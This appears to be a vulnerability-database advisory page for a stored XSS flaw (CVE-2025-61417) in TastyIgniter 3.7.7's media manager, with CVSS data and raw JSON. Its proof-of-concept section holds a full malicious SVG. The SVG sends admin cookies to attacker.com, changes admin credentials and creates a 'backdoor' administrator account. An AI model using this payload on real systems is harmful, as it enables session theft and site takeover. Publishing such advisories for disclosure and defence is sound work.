Security Vulnerability Report
CVE-2025-61417 CVSS 8.8 HIGH

CVE-2025-61417

Published: 2025-10-20 15:15:34
Last Modified: 2025-11-12 17:32:01

Description

Cross-Site Scripting (XSS) vulnerability exists in TastyIgniter 3.7.7, affecting the /admin/media_manager component. Attackers can upload a malicious SVG file containing JavaScript code. When an administrator previews the file, the code executes in their browser context, allowing the attacker to perform unauthorized actions such as modifying the admin account credentials.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:tastyigniter:tastyigniter:3.7.7:*:*:*:*:*:*:* - VULNERABLE
TastyIgniter 3.7.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
SVG (XML)
<!-- CVE-2025-61417 PoC: Malicious SVG file for Stored XSS via Media Manager -->
<!-- Upload this file via /admin/media_manager to trigger XSS when admin previews it -->
<?xml version="1.0" encoding="UTF-8"?>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="500" height="500" onload="executeXSS()">
  <script type="text/javascript">
  // <![CDATA[
  function executeXSS() {
    // Step 1: Steal admin session cookies
    var cookies = document.cookie;
    // Step 2: Exfiltrate cookies to attacker's server
    var img = new Image();
    img.src = "https://attacker.com/steal?cookie=" + encodeURIComponent(cookies);
    // Step 3: Change admin credentials via AJAX
    var xhr = new XMLHttpRequest();
    xhr.open("POST", "/admin/account", true);
    xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
    xhr.send("username=admin&[email protected]&password=Pwned123!");
    // Step 4: Create a new admin account for persistence
    var xhr2 = new XMLHttpRequest();
    xhr2.open("POST", "/admin/staffs", true);
    xhr2.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
    xhr2.send("name=backdoor&[email protected]&password=Backdoor123!&role_id=1");
  }
  // ]]>
  </script>
  <rect x="0" y="0" width="500" height="500" fill="white"/>
  <text x="50" y="250" font-size="20">Image Preview</text>
</svg>
<!-- Alternative simpler PoC using event handler -->
<!--
<svg xmlns="http://www.w3.org/2000/svg" onload="document.location='https://attacker.com/steal?c='+document.cookie">
  <rect width="100" height="100" fill="red"/>
</svg>
-->

References

https://github.com/mg7-x/CVEs/blob/main/CVE-2025-61417/README.md (Exploit, Third Party Advisory)
https://github.com/tastyigniter/TastyIgniter (Product)
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-61417",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-20T15:15:33.700",
    "lastModified": "2025-11-12T17:32:00.760",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Cross-Site Scripting (XSS) vulnerability exists in TastyIgniter 3.7.7, affecting the /admin/media_manager component. Attackers can upload a malicious SVG file containing JavaScript code. When an administrator previews the file, the code executes in their browser context, allowing the attacker to perform unauthorized actions such as modifying the admin account credentials."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          { "lang": "en", "value": "CWE-79" },
          { "lang": "en", "value": "CWE-434" }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:tastyigniter:tastyigniter:3.7.7:*:*:*:*:*:*:*",
                "matchCriteriaId": "09FA6DB8-4888-479C-AAE9-3C16E5306792"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/mg7-x/CVEs/blob/main/CVE-2025-61417/README.md",
        "source": "[email protected]",
        "tags": ["Exploit", "Third Party Advisory"]
      },
      {
        "url": "https://github.com/tastyigniter/TastyIgniter",
        "source": "[email protected]",
        "tags": ["Product"]
      }
    ]
  }
}